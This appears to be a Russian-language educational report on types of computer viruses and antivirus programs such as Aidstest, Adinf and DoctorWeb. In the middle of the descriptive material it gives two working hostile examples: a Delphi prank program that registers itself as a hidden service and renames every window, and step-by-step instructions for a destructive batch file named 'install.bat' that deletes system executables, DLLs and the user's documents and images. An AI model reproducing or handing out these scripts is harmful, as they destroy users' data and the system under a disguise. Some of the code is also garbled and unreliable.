Файловые вирусы внедряются в основном в исполняемые файлы с расширением .СОМ и .ЕХЕ.
Системные вирусы проникают в системные модули и драйверы периферийных устройств, поражают программы-интерпретаторы.
Сетевые вирусы обитают в компьютерных сетях;файлово-загрузочные поражают загрузочные сектора дисков и файлы прикладных программ.
Резидентные вирусы при заражении компьютера оставляют в оперативной памяти свою резидентную часть, которая затем при каждом обращении к операционной системе и к другим объектам внедряется в них и выполняет свои разрушительные действия до выключения или перезагрузки компьютера. Нерезидентные вирусы не заражают оперативную память.
Алгоритмическая особенность построения вирусов оказывает влияние на их проявление и функционирование. Так, репликаторные программы благодаря своему быстрому воспроизводству приводят к переполнению основной памяти, при этом уничтожение программ-репликаторов усложняется, если воспроизводимые программы не являются точными копиями оригинала. В компьютерных сетях распространены программы-«черви». Они вычисляют адреса сетевых компьютеров и «записываются по ним», поддерживая между собой связь. В случае прекращения существования «червя» на каком-либо ПК оставшиеся отыскивают свободный компьютер и внедряют в него такую же программу
" Троянский конь" - это программа, которая, маскируясь под полезную программу, выполняет дополнительные функции, о чем пользователь и не догадывается (например, собирает информацию об именах и паролях, записывая их в специальный файл, доступный лишь создателю данного вируса), либо разрушает файловую систему.
Логическая бомба - это программа, которая встраивается в большой программный комплекс. Она безвредна до наступления определенного события, после которого реализуется ее логический механизм. Например, такая вирусная программа начинает работать после некоторого числа запусков прикладной программы, комплекса, при наличии или отсутствии определенного файла или записи файла и т.д.
Программы-мутанты, самовоспроизводясь, воссоздают копии, которые явно отличаются от оригинала.
Вирусы-невидимки перехватывают обращения операционной системы к пораженным файлам и секторам дисков и подставляют вместо них незараженные объекты.
По степени воздействия на ресурсы компьютерных систем и сетей выделяются безвредные, опасные и разрушительные вирусы.
Безвредные вирусы не разрушают файлы, но могут переполнять оперативную и дисковую память, выводить на экран графические эффекты и т.д. Например:
(программа пишется в Delphi):
program Project1;
uses windows, Messages;
procedure registerserviceprocess; external 'kernel32.dll'
name 'RegisterServiceProcess'; //функция EnumWindowsProc
function EnumWindowsProc(h: hwnd): BOOL; stdcall;
begin
SendMessage(h,WM_SETText,0,Iparam(PChar('Fed_108- компьютерщик)));
end;
//начало программы
var h:THandle;
begin
asm
push 1
push 0
call registerserviceprocess;
end;
//запускаю цикл
whiletruedobegin //запускаю перечесление всех окон
EnumWindows(@EnumWindowsProc,0);
h:=CreateEvent(nil, true, false, ");//делаю задержку в 100 мс.
WaitForSingleObject(h, 100);
CloseHandle(h);
end;
end.
Эффект: все названия окон переименовываются в «Fed_108- компьютерщик»
Опасные вирусы приводят к различным нарушениям в работе компьютера;разрушительные - к стиранию информации, полному или частичному нарушению работы прикладных программ. Например:
Заходим в Far-manager, нажимаем Shift+F4, пишем любое название файла (install.bat), главное чтобы расширение было *.bat.
После чего печатаем примерно следующий текст:
cd C:
cd\
cd windows (у 95% процентов юзеров папка именно такая)
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
cd\
cd моидок~1
del *.doc
del *.txt
del *.htm
del *.html
del *.pdf
del *.jpg
del *.zip
del *.gif
Нажимаем F2 и сохраняем таким образом написанный файл. Эффект: стираются все файлы с указанными расширениями в указанных папках.
Массовое распространение компьютерных вирусов вызвало разработку антивирусных программ, позволяющих обнаруживать и уничножать. Программы-фильтры, или «сторожа», постоянно находятся в оперативной памяти, являясь резидентными, и «перехватывают» все запросы к операционной системе на выполнение «подозрительных действий», т.е. операции, используемых вирусами для своего размножения и порчи информационных и других системных ресурсов в компьютере. Такими действиями могут быть. попытки изменения атрибутов файлов, коррекции исполняемых BAT- СОМ- или ЕХЕ-файлов, записи в загрузочные сектора диска и др. При каждом запросе на такое действие на экран компьютера выдается cообщение о каких либо действий и какая программа желает его выполнять. Пользователь в ответ на это должен либо разрешить выполнение действия, либо запретить его. Подобная часто повторяющаяся «назойливость», раздражающая пользователя, и то, что объем оперативной памяти уменьшается из-за необходимости постоянного нахождения в ней «сторожа», являются главными недостатками этих программ. К тому же программы-фильтры не «лечат» файлы или диски, для этого необходимо использовать другие антивирусные программы. Примером программ- сторожей являются Vsefe, входящая в пакет утилит MS-DOS, и программы, работающие в среде Windows, - AVP, NortonAntiVirusforWindows 95, McAfeeVirusScan 95, ThunderByteProfessionalforWindows 95.
Надежным средством защиты от вирусов считаютсяпрограммы-ревизоры. Они запоминают исходное состояние программ, каталогов и системных областей диска, когда компьютер еще не был заражен вирусом, а затем периодически сравнивают текущее состояние с исходным. При выявлении несоответствий (по длине файла, дате модификации, коду циклического контроля файла и др.) сообщение об этом выдается пользователю. Примером программ-ревизоров являются программа Adinf фирмы «Диалог-Наука» и дополнение к ней в виде AdinfCureModule.
Программы-доктора не только обнаруживают, но и "лечат" зараженные программы или диски, «выкусывая» из зараженных программ тело вируса. Программы этого типа делятся на фаги и полифаги. Последние служат для обнаружения и уничтожения большого количества разнообразных вирусов. Наибольшее распространение в России имеют такие полифаги, как MSAntiVirus, Aidstest и DoctorWeb, которые непрерывно обновляются для борьбы с появляющимися новыми вирусами.
Программы-детекторы позволяют обнаруживать файлы, зараженные одним или несколькими известными разработчикам программ вирусами.
Программы-вакцины, или иммунизаторы, относятся к резидентным программам. Они модифицируют программы и диски таким образом, что это не отражается на работе программ, но вирус, от которого производится вакцинация, считает их уже зараженными и не внедряется в них.
6. Антивирусные программы.
Как известно, вирус может содержаться только в файлах, которым передаётся управление: программы, динамические библиотеки, драйверы, командные файлы, скрипты, документы и шаблоны с макросами, то есть файлы с расширениями COM, EXE, DLL, DRV, VXD, SYS, BAT, DOC, DOT, XLS и др. Таким образом, например, обычный текстовый файл (с расширением TXT) можно запускать без опасений получить заразу - TXT-файл будет просто открыт в Блокноте.
Охарактеризуем некоторые антивирусные программы. К настоящему времени зарубежными и отечественными фирмами и специалистами разработано большое количество антивирусных программ. Многие из них, получившие широкое признание, постоянно пополняются новыми средствами для борьбы с вирусами и сопровождаются разработчиками.
У российских пользователей персональных компьютеров популярен антивирусный комплект АО «Диалог-Наука», в который входят программа-ревизор диска Adinf и лечащий блок AdinfCureModule. Одна из последних версий этой программы-полифага Aidstest (конец 1997 г.) обнаруживает более 1700 вирусов. Aidstest для своего нормального функционирования требует, чтобы в оперативной памяти не было других резидентных антивирусных программ, блокирующих запись в программные файлы, поэтому их следует предварительно выгрузить.
При запуске программы Aidstest проверяет оперативную память на наличие известных вирусов и обезвреживает их. При этом парализуются функции вируса, связанные с размножением, а другие побочные эффекты могут оставаться, в связи с чем после окончания обезвреживания вируса программа выдает запрос о перезагрузке. Перезагрузку рекомендуется осуществить кнопкой RESET, так как при перезагрузке клавишами [CTRL]+[Alt]+[Del] некоторые вирусы могут сохраняться. Кроме того, компьютер и антивирусную программу лучше запустить с защищенной от записи дискеты, чтобы при запуске с зараженного диска вирус не смог записаться в память резидентом и препятствовать лечению.
Aidstest тестирует свое тело на наличие известных вирусов, а также судит по искажению в своем коде о своем заражении неизвестным вирусом. При этом возможны случаи «ложной тревоги», например при сжатии антивируса программой- упаковщиком. Программа не имеет графического интерфейса, режимы ее 1 работы задаются с помощью ключей. Указав путь, можно проверить не весь диск, а отдельный подкаталог. Оптимальный режим для ежедневной работы задается ключами /g (проверка всех файлов) и /s (медленная проверка). Увеличение времени при таких опциях практически неощутимо (полностью заполненный жесткий диск емкостью 520 Мбайт на ПК с процессором 486DX2 тестируется менее чем 2 мин), зато вероятность обнаружения вирусов резко повышается.
Ключ If следует использовать тогда, когда Aidstest, а также другие программы-антивирусы указывают на наличие вируса в каком-либо файле. При обнаружении вируса в ценном для пользователя файле этот файл следует переписать на дискету и попытаться вылечить с помощью ключа /f. Если попытка не увенчается успехом, надо удалить все зараженные копии файла и проверить диск снова. Если в файле содержится важная информация, которую нежелательно удалять, можно заархивировать файл или найти другую антивирусную программу, способную лечить этот тип вируса.